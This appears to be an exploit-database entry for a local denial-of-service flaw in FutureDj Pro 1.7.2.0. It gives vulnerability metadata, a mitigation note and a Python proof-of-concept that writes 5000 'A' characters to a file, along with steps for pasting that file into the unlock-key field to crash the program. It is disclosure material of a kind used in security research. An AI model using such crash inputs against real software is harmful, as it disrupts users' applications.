FutureDj Pro Local Dos Exploit

vendor:

FutureDj Pro

by:

Achilles

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: FutureDj Pro

Affected Version From: 1.7.2.0

Affected Version To: 1.7.2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:xylio:future_dj_pro

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 Ultimate

2019

FutureDj Pro Local Dos Exploit

A Denial of Service vulnerability exists in FutureDj Pro version 1.7.2.0 32bit. An attacker can exploit this vulnerability by running a python code to create a file containing 5000 bytes of 'A' characters, copying the content of the file to clipboard, opening the FutureDj Pro application, clicking start Free Trial and then 'Click here to Buy', and then 'i already bought it', pasting the content of the EVIL.txt into the 'Unlock key' Name field, clicking 'OK', clicking 'OK' and clicking 'Exit'. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of FutureDj Pro.

Source

Exploit-DB raw data:

# Exploit Title: FutureDj Pro Local Dos Exploit
# Date: 07.02.2019
# Vendor Homepage: https://www.xylio.com
# Software Link:   https://www.xylio.com/future-dj-pro-a-new-level-of-mixing-perfection/
# Exploit Author: Achilles
# Tested Version: 1.7.2.0 32bit
# Tested on: Windows 7 SP1 Ultimate

# 1.- Run python code : FutureDj Pro.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open future.dj.exe
# 4.- In the New Window click start Free Trial and then 'Click here to Buy'
# 5.- And then 'i already bought it'
# 6.- Paste the Content of EVIL.txt into the 'Unlock key' Name field.
# 7.- Click 'OK'
# 8.- Click 'OK'
# 9.- Click 'Exit'
# 10.- And you will see a crash


#!/usr/bin/env python

buffer = "\x41" * 5000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"